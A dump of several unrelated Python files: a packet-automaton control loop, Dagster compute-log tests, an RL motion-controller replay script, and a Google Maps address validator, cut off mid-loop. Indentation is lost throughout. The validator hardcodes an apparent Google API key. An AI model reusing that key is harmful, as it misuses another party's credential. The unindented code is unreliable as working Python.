if cond.atmt_type == ATMT.RECV:
if self.store_packets:
self.packets.append(args[0])
for action in self.actions[cond.atmt_condname]:
self.debug(2, " + Running action [%s]" % action.__name__)
action(self, *state_req.action_args, **state_req.action_kargs)
raise
except Exception as e:
self.debug(2, "%s [%s] raised exception [%s]" % (cond.atmt_type, cond.atmt_condname, e)) # noqa: E501
raise
else:
self.debug(2, "%s [%s] not taken" % (cond.atmt_type, cond.atmt_condname)) # noqa: E501
def _do_start(self, *args, **kargs):
ready = threading.Event()
_t = threading.Thread(target=self._do_control, args=(ready,) + (args), kwargs=kargs) # noqa: E501
_t.setDaemon(True)
_t.start()
ready.wait()
def _do_control(self, ready, *args, **kargs):
with self.started:
self.threadid = threading.currentThread().ident
# Update default parameters
a = args + self.init_args[len(args):]
k = self.init_kargs.copy()
k.update(kargs)
self.parse_args(*a, **k)
# Start the automaton
self.state = self.initial_states[0](self)
self.send_sock = self.send_sock_class(**self.socket_kargs)
self.listen_sock = self.recv_sock_class(**self.socket_kargs)
self.packets = PacketList(name="session[%s]" % self.__class__.__name__) # noqa: E501
singlestep = True
iterator = self._do_iter()
self.debug(3, "Starting control thread [tid=%i]" % self.threadid)
# Sync threads
ready.set()
try:
while True:
c = self.cmdin.recv()
self.debug(5, "Received command %s" % c.type)
if c.type == _ATMT_Command.RUN:
singlestep = False
elif c.type == _ATMT_Command.NEXT:
singlestep = True
elif c.type == _ATMT_Command.FREEZE:
continue
elif c.type == _ATMT_Command.STOP:
break
while True:
state = next(iterator)
if isinstance(state, self.CommandMessage):
break
elif isinstance(state, self.Breakpoint):
c = Message(type=_ATMT_Command.BREAKPOINT, state=state) # noqa: E501
self.cmdout.send(c)
break
if singlestep:
c = Message(type=_ATMT_Command.SINGLESTEP, state=state) # noqa: E501
self.cmdout.send(c)
break
except (StopIteration, RuntimeError):
c = Message(type=_ATMT_Command.END,
result=self.final_state_output)
self.cmdout.send(c)
except Exception as e:
exc_info = sys.exc_info()
self.debug(3, "Transferring exception from tid=%i:\n%s" % (self.threadid, traceback.format_exception(*exc_info))) # noqa: E501
m = Message(type=_ATMT_Command.EXCEPTION, exception=e, exc_info=exc_info) # noqa: E501
self.cmdout.send(m)
self.debug(3, "Stopping control thread (tid=%i)" % self.threadid)
self.threadid = None
def _do_iter(self):
while True:
try:
self.debug(1, "## state=[%s]" % self.state.state)
# Entering a new state. First, call new state function
if self.state.state in self.breakpoints and self.state.state != self.breakpointed: # noqa: E501
self.breakpointed = self.state.state
yield self.Breakpoint("breakpoint triggered on state %s" % self.state.state, # noqa: E501
state=self.state.state)
self.breakpointed = None
state_output = self.state.run()
if self.state.error:
raise self.ErrorState("Reached %s: [%r]" % (self.state.state, state_output), # noqa: E501
result=state_output, state=self.state.state) # noqa: E501
if self.state.final:
self.final_state_output = state_output
return
if state_output is None:
state_output = ()
elif not isinstance(state_output, list):
state_output = state_output,
# Then check immediate conditions
for cond in self.conditions[self.state.state]:
self._run_condition(cond, *state_output)
# If still there and no conditions left, we are stuck!
if (len(self.recv_conditions[self.state.state]) == 0 and
len(self.ioevents[self.state.state]) == 0 and
len(self.timeout[self.state.state]) == 1):
raise self.Stuck("stuck in [%s]" % self.state.state,
state=self.state.state, result=state_output) # noqa: E501
# Finally listen and pay attention to timeouts
expirations = iter(self.timeout[self.state.state])
next_timeout, timeout_func = next(expirations)
t0 = time.time()
fds = [self.cmdin]
if len(self.recv_conditions[self.state.state]) > 0:
fds.append(self.listen_sock)
for ioev in self.ioevents[self.state.state]:
fds.append(self.ioin[ioev.atmt_ioname])
while True:
t = time.time() - t0
if next_timeout is not None:
if next_timeout <= t:
self._run_condition(timeout_func, *state_output)
next_timeout, timeout_func = next(expirations)
if next_timeout is None:
remain = None
else:
remain = next_timeout - t
self.debug(5, "Select on %r" % fds)
r = select_objects(fds, remain)
self.debug(5, "Selected %r" % r)
for fd in r:
self.debug(5, "Looking at %r" % fd)
if fd == self.cmdin:
yield self.CommandMessage("Received command message") # noqa: E501
elif fd == self.listen_sock:
try:
pkt = self.listen_sock.recv(MTU)
except recv_error:
pass
else:
if pkt is not None:
if self.master_filter(pkt):
self.debug(3, "RECVD: %s" % pkt.summary()) # noqa: E501
for rcvcond in self.recv_conditions[self.state.state]: # noqa: E501
self._run_condition(rcvcond, pkt, *state_output) # noqa: E501
else:
self.debug(4, "FILTR: %s" % pkt.summary()) # noqa: E501
else:
self.debug(3, "IOEVENT on %s" % fd.ioname)
for ioevt in self.ioevents[self.state.state]:
if ioevt.atmt_ioname == fd.ioname:
self._run_condition(ioevt, fd, *state_output) # noqa: E501
except ATMT.NewStateRequested as state_req:
self.debug(2, "switching from [%s] to [%s]" % (self.state.state, state_req.state)) # noqa: E501
self.state = state_req
yield state_req
# Public API
def add_interception_points(self, *ipts):
for ipt in ipts:
if hasattr(ipt, "atmt_state"):
ipt = ipt.atmt_state
self.interception_points.add(ipt)
def remove_interception_points(self, *ipts):
for ipt in ipts:
if hasattr(ipt, "atmt_state"):
ipt = ipt.atmt_state
self.interception_points.discard(ipt)
def add_breakpoints(self, *bps):
for bp in bps:
if hasattr(bp, "atmt_state"):
bp = bp.atmt_state
self.breakpoints.add(bp)
def remove_breakpoints(self, *bps):
for bp in bps:
if hasattr(bp, "atmt_state"):
bp = bp.atmt_state
self.breakpoints.discard(bp)
def start(self, *args, **kargs):
if not self.started.locked():
self._do_start(*args, **kargs)
def run(self, resume=None, wait=True):
if resume is None:
resume = Message(type=_ATMT_Command.RUN)
self.cmdin.send(resume)
if wait:
try:
c = self.cmdout.recv()
except KeyboardInterrupt:
self.cmdin.send(Message(type=_ATMT_Command.FREEZE))
return
if c.type == _ATMT_Command.END:
return c.result
elif c.type == _ATMT_Command.INTERCEPT:
raise self.InterceptionPoint("packet intercepted", state=c.state.state, packet=c.pkt) # noqa: E501
elif c.type == _ATMT_Command.SINGLESTEP:
raise self.Singlestep("singlestep state=[%s]" % c.state.state, state=c.state.state) # noqa: E501
elif c.type == _ATMT_Command.BREAKPOINT:
raise self.Breakpoint("breakpoint triggered on state [%s]" % c.state.state, state=c.state.state) # noqa: E501
elif c.type == _ATMT_Command.EXCEPTION:
six.reraise(c.exc_info[0], c.exc_info[1], c.exc_info[2])
def runbg(self, resume=None, wait=False):
self.run(resume, wait)
def next(self):
return self.run(resume=Message(type=_ATMT_Command.NEXT))
__next__ = next
def stop(self):
self.cmdin.send(Message(type=_ATMT_Command.STOP))
with self.started:
# Flush command pipes
while True:
r = select_objects([self.cmdin, self.cmdout], 0)
if not r:
break
for fd in r:
fd.recv()
def restart(self, *args, **kargs):
self.stop()
self.start(*args, **kargs)
def accept_packet(self, pkt=None, wait=False):
rsm = Message()
if pkt is None:
rsm.type = _ATMT_Command.ACCEPT
else:
rsm.type = _ATMT_Command.REPLACE
rsm.pkt = pkt
return self.run(resume=rsm, wait=wait)
def reject_packet(self, wait=False):
rsm = Message(type=_ATMT_Command.REJECT)
return self.run(resume=rsm, wait=wait)
|
test_stdout.py
|
import multiprocessing
import os
import random
import string
import sys
import tempfile
import time
import pytest
from dagster import (
DagsterEventType,
InputDefinition,
ModeDefinition,
execute_pipeline,
fs_io_manager,
pipeline,
reconstructable,
resource,
solid,
)
from dagster.core.execution.compute_logs import should_disable_io_stream_redirect
from dagster.core.instance import DagsterInstance
from dagster.core.storage.compute_log_manager import ComputeIOType
from dagster.core.test_utils import create_run_for_test, instance_for_test
from dagster.utils import ensure_dir, touch_file
HELLO_SOLID = "HELLO SOLID"
HELLO_RESOURCE = "HELLO RESOURCE"
SEPARATOR = os.linesep if (os.name == "nt" and sys.version_info < (3,)) else "\n"
@resource
def resource_a(_):
print(HELLO_RESOURCE) # pylint: disable=print-call
return "A"
@solid
def spawn(_):
return 1
@solid(input_defs=[InputDefinition("num", int)], required_resource_keys={"a"})
def spew(_, num):
print(HELLO_SOLID) # pylint: disable=print-call
return num
def define_pipeline():
@pipeline(
mode_defs=[ModeDefinition(resource_defs={"a": resource_a, "io_manager": fs_io_manager})]
)
def spew_pipeline():
spew(spew(spawn()))
return spew_pipeline
def normalize_file_content(s):
return "\n".join([line for line in s.replace(os.linesep, "\n").split("\n") if line])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk():
with instance_for_test() as instance:
spew_pipeline = define_pipeline()
manager = instance.compute_log_manager
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith("spawn"):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, "r") as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk_multiprocess():
spew_pipeline = reconstructable(define_pipeline)
with instance_for_test() as instance:
manager = instance.compute_log_manager
result = execute_pipeline(
spew_pipeline,
run_config={"execution": {"multiprocess": {}}},
instance=instance,
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith("spawn"):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, "r") as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager():
with instance_for_test() as instance:
manager = instance.compute_log_manager
spew_pipeline = define_pipeline()
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 3
step_key = "spew"
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
stderr = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDERR)
cleaned_logs = stderr.data.replace("\x1b[34m", "").replace("\x1b[0m", "")
assert "dagster - DEBUG - spew_pipeline - " in cleaned_logs
bad_logs = manager.read_logs_file("not_a_run_id", step_key, ComputeIOType.STDOUT)
assert bad_logs.data is None
assert not manager.is_watch_completed("not_a_run_id", step_key)
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager_subscriptions():
with instance_for_test() as instance:
spew_pipeline = define_pipeline()
step_key = "spew"
result = execute_pipeline(spew_pipeline, instance=instance)
stdout_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDOUT
)
stderr_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDERR
)
stdout = []
stdout_observable.subscribe(stdout.append)
stderr = []
stderr_observable.subscribe(stderr.append)
assert len(stdout) == 1
assert stdout[0].data.startswith(HELLO_SOLID)
assert stdout[0].cursor in [12, 13]
assert len(stderr) == 1
assert stderr[0].cursor == len(stderr[0].data)
assert stderr[0].cursor > 400
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager_subscription_updates():
from dagster.core.storage.local_compute_log_manager import LocalComputeLogManager
with tempfile.TemporaryDirectory() as temp_dir:
compute_log_manager = LocalComputeLogManager(temp_dir, polling_timeout=0.5)
run_id = "fake_run_id"
step_key = "spew"
stdout_path = compute_log_manager.get_local_path(run_id, step_key, ComputeIOType.STDOUT)
# make sure the parent directory to be watched exists, file exists
ensure_dir(os.path.dirname(stdout_path))
touch_file(stdout_path)
# set up the subscription
messages = []
observable = compute_log_manager.observable(run_id, step_key, ComputeIOType.STDOUT)
observable.subscribe(messages.append)
# returns a single update, with 0 data
assert len(messages) == 1
last_chunk = messages[-1]
assert not last_chunk.data
assert last_chunk.cursor == 0
with open(stdout_path, "a+") as f:
print(HELLO_SOLID, file=f) # pylint:disable=print-call
# wait longer than the watchdog timeout
time.sleep(1)
assert len(messages) == 2
last_chunk = messages[-1]
assert last_chunk.data
assert last_chunk.cursor > 0
def gen_solid_name(length):
return "".join(random.choice(string.ascii_lowercase) for x in range(length))
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_long_solid_names():
solid_name = gen_solid_name(300)
@pipeline(mode_defs=[ModeDefinition(resource_defs={"a": resource_a})])
def long_pipeline():
spew.alias(name=solid_name)()
with instance_for_test() as instance:
manager = instance.compute_log_manager
result = execute_pipeline(
long_pipeline,
instance=instance,
run_config={"solids": {solid_name: {"inputs": {"num": 1}}}},
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 1
step_key = compute_steps[0]
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
def execute_inner(step_key, pipeline_run, instance_ref):
instance = DagsterInstance.from_ref(instance_ref)
inner_step(instance, pipeline_run, step_key)
def inner_step(instance, pipeline_run, step_key):
with instance.compute_log_manager.watch(pipeline_run, step_key=step_key):
time.sleep(0.1)
print(step_key, "inner 1") # pylint: disable=print-call
print(step_key, "inner 2") # pylint: disable=print-call
print(step_key, "inner 3") # pylint: disable=print-call
time.sleep(0.1)
def expected_inner_output(step_key):
return "\n".join(
["{step_key} inner {num}".format(step_key=step_key, num=i + 1) for i in range(3)]
)
def expected_outer_prefix():
return "\n".join(["outer {num}".format(num=i + 1) for i in range(3)])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_single():
with instance_for_test() as instance:
pipeline_name = "foo_pipeline"
pipeline_run = create_run_for_test(instance, pipeline_name=pipeline_name)
step_keys = ["A", "B", "C"]
with instance.compute_log_manager.watch(pipeline_run):
print("outer 1") # pylint: disable=print-call
print("outer 2") # pylint: disable=print-call
print("outer 3") # pylint: disable=print-call
for step_key in step_keys:
inner_step(instance, pipeline_run, step_key)
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_base_with_spaces():
with tempfile.TemporaryDirectory() as temp_dir:
with instance_for_test(
temp_dir=temp_dir,
overrides={
"compute_logs": {
"module": "dagster.core.storage.local_compute_log_manager",
"class": "LocalComputeLogManager",
"config": {"base_dir": os.path.join(temp_dir, "base with spaces")},
}
},
) as instance:
pipeline_name = "foo_pipeline"
pipeline_run = create_run_for_test(instance, pipeline_name=pipeline_name)
step_keys = ["A", "B", "C"]
with instance.compute_log_manager.watch(pipeline_run):
print("outer 1") # pylint: disable=print-call
print("outer 2") # pylint: disable=print-call
print("outer 3") # pylint: disable=print-call
for step_key in step_keys:
inner_step(instance, pipeline_run, step_key)
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_multi():
ctx = multiprocessing.get_context("spawn")
with instance_for_test() as instance:
pipeline_name = "foo_pipeline"
pipeline_run = create_run_for_test(instance, pipeline_name=pipeline_name)
step_keys = ["A", "B", "C"]
with instance.compute_log_manager.watch(pipeline_run):
print("outer 1") # pylint: disable=print-call
print("outer 2") # pylint: disable=print-call
print("outer 3") # pylint: disable=print-call
for step_key in step_keys:
process = ctx.Process(
target=execute_inner, args=(step_key, pipeline_run, instance.get_ref())
)
process.start()
process.join()
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
# The way that the multiprocess compute-logging interacts with pytest (which stubs out the
# sys.stdout fileno) makes this difficult to test. The pytest-captured stdout only captures
# the stdout from the outer process, not also the inner process
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
|
play_controller.py
|
import argparse
import multiprocessing as mp
import os
current_dir = os.path.dirname(os.path.realpath(__file__))
parent_dir = os.path.dirname(current_dir)
os.sys.path.append(parent_dir)
import gym
import numpy as np
import torch
from common.misc_utils import EpisodeRunner, POSE_CSV_HEADER
FOOT2METER = 0.3048
FOOT2CM = FOOT2METER * 100
env_module = "environments"
def get_model_paths(args):
pwd = os.getcwd()
controller_path = None
pose_vae_path = None
if args.dir is not None:
from glob import glob
base_dir = os.path.join(pwd, args.dir)
candidate_controller_paths = glob(base_dir + "/con*.pt")
candidate_pose_vae_paths = glob(base_dir + "/posevae*.pt")
if len(candidate_controller_paths) == 0 or len(candidate_pose_vae_paths) == 0:
print("Controller or VAE file not found in ", base_dir)
exit(0)
controller_path = candidate_controller_paths[0]
for path in candidate_controller_paths:
if "con_" + args.env in path:
controller_path = path
pose_vae_path = candidate_pose_vae_paths[0]
if args.con is not None:
controller_path = os.path.join(pwd, args.con)
if args.vae is not None:
pose_vae_path = os.path.join(pwd, args.vae)
return controller_path, pose_vae_path
def visualize_rl_controller_replay(args):
device = "cpu"
controller_path, pose_vae_path = get_model_paths(args)
actor_critic = torch.load(controller_path, map_location=device)
if hasattr(actor_critic, "env_info"):
frame_skip = actor_critic.env_info["frame_skip"]
else:
frame_skip = 1
controller = actor_critic.actor
env = gym.make(
"{}:{}".format(env_module, args.env),
num_parallel=args.num,
device=device,
pose_vae_path=pose_vae_path,
rendered=True,
use_params=args.gui,
camera_tracking=args.track,
frame_skip=frame_skip,
)
print("Loaded:", controller_path)
obs = env.reset()
ep_reward = 0
# overwrite if necessary
if args.frame != -1:
env.reset_initial_frames(args.frame)
with EpisodeRunner(env, save=args.save, max_steps=args.len, csv=args.csv) as runner:
while not runner.done:
with torch.no_grad():
action = controller(obs)
obs, reward, done, info = env.step(action)
ep_reward += reward
if done.any():
print("--- Episode reward: %2.4f" % float(ep_reward[done].mean()))
ep_reward *= (~done).float()
reset_indices = env.parallel_ind_buf.masked_select(done.squeeze())
obs = env.reset(reset_indices)
if info.get("reset"):
print("--- Episode reward: %2.4f" % float(ep_reward.mean()))
ep_reward = 0
obs = env.reset()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--env",
type=str,
default="TimedTargetEnv-v0",
required=False,
help="Envrionment name",
)
parser.add_argument(
"--con",
type=str,
default=None,
required=False,
help="Path to trained RL controller network file",
)
parser.add_argument(
"--vae",
type=str,
default=None,
required=False,
help="Path to VAE associated with the environment",
)
parser.add_argument(
"--dir",
type=str,
default=None,
help="Directory containing both VAE and controller files",
)
parser.add_argument(
"--num", type=int, default=1, help="Number of characters to simulate"
)
parser.add_argument("--gui", type=int, default=1, help="Show parameters in GUI")
parser.add_argument(
"--track",
type=int,
default=1,
help="1 - camera tracks character | 0 - static camera",
)
parser.add_argument(
"--frame",
type=int,
default=-1,
help="Initial frame for random walk (-1 for random)",
)
parser.add_argument(
"--save",
action="store_true",
default=False,
help="Save video recorded from camera",
)
parser.add_argument(
"--csv",
type=str,
default=None,
required=False,
help="CSV path to dump trajectory",
)
parser.add_argument(
"--len",
type=int,
default=None,
help="Length of video to save in number of frames",
)
args = parser.parse_args()
ps = [
mp.Process(target=visualize_rl_controller_replay, args=(args,)),
]
for p in ps:
p.start()
for p in ps:
p.join()
|
Address_Validator.py
|
#!/usr/bin/python
"""
VALIDATE THE MATCHED ADDRESSES WITH GOOGLE MAPS APIs
IN ORDER TO OBTAIN WHICH ADDRESS IS CORRECT AND
WHICH ONES NEEDS TO BE CHANGED
"""
import itertools
import json
import os
import re
import sys
import time
import uuid
from difflib import SequenceMatcher
import requests
import threading
business_address_path = "data/output_files/valid_address.json"
shoppingstreet_path = "data/output_files/shoppingstreet.json"
city_path = "data/output_files/city.json"
input_filename = "data/output_files/match.json"
input_filename1 = "data/output_files/cross_streets.json"
validated_streets_path = "data/intern_database/validated_streets.json"
done = False
valids = []
# ------------------ DATA LOADING --------------------------------
# load match.json file
with open(input_filename, 'r') as outfile:
addresses = json.load(outfile)
outfile.close()
# load cross_street.json file
with open(input_filename1, 'r') as outfile:
cross_streets = json.load(outfile)
outfile.close()
# loading valid_address file
if os.stat(validated_streets_path).st_size > 0:
with open(validated_streets_path, 'r') as outfile:
valids = json.load(outfile)
outfile.close()
# ----------------- FUNCTION DEFINITIONS ------------------------
def animate():
"""
animation function for the terminal
"""
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rloading ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
def similar(a, b):
"""
:param a: string
:param b: string
:return: ratio of matching
"""
return SequenceMatcher(None, a, b).ratio()
def get_street_name(street_id):
"""
:param street_id: String shopping street id to check
:return: street name related, from shoppingstreet.json
"""
street_name = None
with open(shoppingstreet_path, "r+") as shop_check:
shop_check.seek(0, os.SEEK_SET)
shops = json.load(shop_check)
shop_check.close()
for shop in shops:
if shop["street_id"] in street_id:
street_name = shop["name"]
return street_name
def get_city_name(city_id):
"""
:param city_id: String city id to check
:return: city name related, from city.json
"""
city_name = None
with open(city_path, "r+") as city_check:
city_check.seek(0, os.SEEK_SET)
cities = json.load(city_check)
city_check.close()
for citie in cities:
if citie["city_id"] in city_id:
city_name = citie["name"]
return city_name
def index_of(val, in_list):
"""
:param val: String variable to test
:param in_list: list of Strings
:return: index of the value if it's in the list
"""
try:
return in_list.index(val)
except ValueError:
return -1
def get_google_results(api_id, address, return_response_fields=None):
"""
Get google results from Google Maps Geocoding API / Google Maps Places API / Google Maps Place details API
:param: address: String address. Complete Address example "18 Starbucks Alexanderplatz, Berlin, Germany"
Address may vary based on the API used.
:param: api_id: Number refers to which API is requested:
1: geocoding API
2: nearbysearch API
:param: return_response_fields: Booleen/String indicate to return the full response from google if its None
Or returns specific fields. For example :"google_ratings,website,formated_address, etc."
:return: Google result based on the api used
"""
# set up api key
api_key = "AIzaSyDQaVh67imEZW2FLH7hb33SB63jv2shkqQ"
request_url = ""
outputs = []
building = address[0]
address1 = address[0] + " " + address[1] + " " + address[2]
if api_id == "geocoding":
request_url = "https://maps.googleapis.com/maps/api/geocode/json?address={}".format(
address1) + "&key={}".format(
api_key)
print("GEOCODING |||||||||| " + request_url)
if api_id == "nearbysearch":
lat_long = get_google_results("geocoding", address, return_response_fields="latitude")[0][
"latitude"].__str__() + "," + \
get_google_results("geocoding", address, return_response_fields="longitude")[0][
"longitude"].__str__()
request_url = "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location={}".format(
lat_long) + "&rankby=distance&type=establishment&key={}".format(api_key)
print("NEARBYSEARCH |||||||||| " + request_url)
results = requests.get(request_url)
results = results.json()
if len(results['results']) == 0:
return False
else:
for answer in results['results']:
if api_id == "geocoding":
street_number = "0"
for y in answer.get('address_components'):
if 'street_number' in y.get('types'): street_number = y['long_name']
route_name = "0"
for z in answer.get('address_components'):
if 'route' in z.get('types'): route_name = z['long_name']
output = {
"entry": building,
"street_number": street_number,
"route_name": route_name,
"latitude": answer.get('geometry').get('location').get('lat'),
"longitude": answer.get('geometry').get('location').get('lng'),
"google_place_id": answer.get("place_id"),
"type": ",".join(answer.get('types')),
"postcode": ",".join(
[x['long_name'] for x in answer.get('address_components') if 'postal_code' in x.get('types')]),
}
if (output["route_name"]) == "0":
output["route_name"] = answer.get('formatted_address')
if (output["street_number"]) == "0":
pattern = re.compile("^(.+?),")
pattern0 = re.compile(",(.+?),")
patterns = [pattern, pattern0]
for pat in patterns:
if pat.search(answer.get('formatted_address')):
ad = re.findall(pat, answer.get('formatted_address'))[0]
pattern1 = re.compile("\d+")
if pattern1.search(ad):
ad1 = re.findall(pattern1, ad)[0]
if len(ad1) < 4: output["street_number"] = ad1
outputs += [output]
if api_id == "nearbysearch":
street_number = "0"
route_name = answer.get('vicinity')
if answer.get('rating') is None:
rating = 0
else:
rating = int(answer.get('rating'))
output = {'input_string': address1, "street_number": street_number, "route_name": route_name,
"google_place_id": answer.get("place_id"), "type": ",".join(answer.get('types')),
"rating": rating}
pattern = re.compile("^(.+?),")
pattern0 = re.compile(",(.+?),")
patterns = [pattern, pattern0]
for pat in patterns:
if pat.search(route_name):
ad = re.findall(pat, answer.get('vicinity'))[0]
pattern1 = re.compile("\d+")
if pattern1.search(ad):
ad1 = re.findall(pattern1, ad)[0]
if len(ad1) < 4: output["street_number"] = ad1
if output["street_number"] == address[0]:
outputs += [output]
if return_response_fields is None and len(outputs) > 0:
return outputs
elif (len(outputs) > 0) and (return_response_fields is not None):
output_filter = []
for item in outputs:
output_filter += [{"" + return_response_fields: item[return_response_fields]}]
outputs = output_filter
return outputs
else:
return False
def get_valid_business(street_number, street_name, city_name):
"""
Search nearby the geocoded street address to find the related adresses
:param street_number:String street number to search
:param street_name: String street name
:param city_name: String city name to search
:return: most rated valid address or False
"""
building = [street_number, street_name, city_name]
result = get_google_results("nearbysearch", building, return_response_fields=None)
if result:
result = sorted(result, key=lambda k: k.get('rating', 0), reverse=True)[0]["google_place_id"]
return result
else:
return False
def is_cross_street(street1, street2, city):
"""
Test if 2 street crosses
:param street1: String street name 2
:param street2: String street name 1
:param city: String city name
:return: boolean
"""
if get_google_results("geocoding", [street1, street2, city], return_response_fields=None):
if "intersection" in get_google_results("geocoding", [street1, street2, city], return_response_fields=None)[0][
"type"]:
return True
return False
def similarL1(a, b):
"""
get similar between a string and a string in a list
:param a: String
:param b: List of strings
:return: boolean
"""
if len(b) > 0:
for x in b:
if x == a:
return True
return False
def similarL1a(a, b):
"""
get similar between a string in a list
:param a: String
:param b: List of strings
:return: boolean
"""
for x in b:
if x.lower() in a.lower():
return True
return False
def similarL(a, b, ratio):
"""
get similar ratio between a string in a list
:param a: String
:param b: List of strings
:return:
"""
for x in b:
if SequenceMatcher(None, a, x).ratio() > ratio:
return x
return False
def in_suit(list, entry):
"""
test 2 street numbers if the first in the second suit of numbers.
For example: "25" in "22-27" retruns True
:param a: String
:param b: List of strings
:return: boolean
"""
text = list.replace("-", "")
if ("-" not in entry) and (entry.isdigit() is True) and (text.isdigit() is True):
list1 = list.split("-")
x = int(list1[0])
suit = set()
suit.add(x)
while x < int(list1[len(list1) - 1]):
x += 1
suit.add(x)
suit.add(int(list1[len(list1) - 1]))
if int(entry) in suit:
return True
else:
return False
return False
def in_suit1(list, entry):
"""
test 2 street numbers if the second street number in the first suit of numbers.
For example: "22-27" in "25"retruns True
:param a: String List of number
:param b: Int of number Number
:return: boolean
"""
text = list.replace("-", "")
if ("-" not in entry) and (entry.isdigit() is True) and (text.isdigit() is True):
list1 = list.split("-")
x = int(list1[0])
suit = set()
suit.add(x)
while x < int(list1[len(list1) - 1]):
x += 1
suit.add(x)
suit.add(int(list1[len(list1) - 1]))
if int(entry) in suit:
return True
else:
return False
return False
def in_suit3(list, list0):
"""
test 2 suits of street numbers if they have crossed numbers
For example: "22-27" in "21-24"retruns True
:param a: Int of number
:param b: String List of number
:return: boolean
"""
text = list.replace("-", "")
text0 = list0.replace("-", "")
if ("-" in list) and ("-" in list0) and (text.isdigit() is True) and (text0.isdigit() is True):
list1 = list.split("-")
x = int(list1[0])
suit = set()
suit.add(x)
while x < int(list1[len(list1) - 1]):
x += 1
suit.add(x)
suit.add(int(list1[len(list1) - 1]))
list2 = list0.split("-")
y = int(list2[0])
suit0 = set()
suit0.add(y)
while y < int(list2[len(list2) - 1]):
y += 1
suit0.add(y)
suit0.add(int(list2[len(list2) - 1]))
temp = [item for item in suit if item in suit0]
if len(temp) > 0: return True
return False
# --------------------- MATCH.JSON VALIDATION------------------------------------------
print(
"\n ################################# Matched addresses validation ######################################################")
t = threading.Thread(target=animate)
t.start()
# the valid business addresses found in the source file (valid name and street number)
businesses = []
# the invalid business addresses found in the source file (different number and valid street name)
not_valids = []
# street numbers without business name (extracted from the not_valid object)
incorrects = []
# the corrected street adresses without business name
businesses1 = []
cross_street_count = 0
for shop in addresses:
is_validated = True
for valid in valids:
if shop["street_id"] == valid["street_id"] and valid["Address_Validator"] == False:
is_validated = False
if is_validated == False:
street_name = get_street_name(shop["street_id"])
city_name = get_city_name(shop["city_id"])
business = {"street_id": shop["street_id"], "building": []}
not_valid = {"building": []}
incorrect = {"street_id": shop["street_id"], "city_id": shop["city_id"], "building": []}
business_count = 0
not_valid_count = 0
incorrect_count = 0
cross_street_list = set()
for c in cross_streets:
if c["street_id"] in shop["street_id"]:
for b in c["cross_streets"]:
cross_street_list.add(b["name"])
cross_street_list_count = len(cross_street_list)
for entry in shop["building"]:
if (entry["name"].lower() == "umbau") or (entry["name"].lower() == "neuvermietung"):
incorrect["building"].extend({entry["number"]})
incorrect_count += 1
else:
if get_google_results("geocoding", [entry["name"].lower(), street_name, city_name],
return_response_fields=None):
result = get_google_results("geocoding", [entry["name"].lower(), street_name, city_name],
return_response_fields=None)
for r in result:
